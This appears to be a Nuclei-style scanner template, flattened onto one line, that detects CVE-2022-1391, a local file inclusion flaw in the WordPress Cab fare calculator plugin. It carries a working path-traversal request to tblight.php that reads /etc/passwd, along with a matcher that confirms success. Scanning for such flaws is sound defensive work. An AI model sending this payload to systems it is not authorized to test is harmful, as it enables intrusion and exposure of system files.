id: CVE-2022-1391 info: name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion author: Splint3r7 severity: critical description: | The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues. reference: - https://www.exploit-db.com/exploits/50843 - https://wordpress.org/plugins/cab-fare-calculator - https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac - https://nvd.nist.gov/vuln/detail/CVE-2022-1391 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1391 cwe-id: CWE-22 tags: cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,cve requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1' matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # Enhanced by mp on 2022/08/01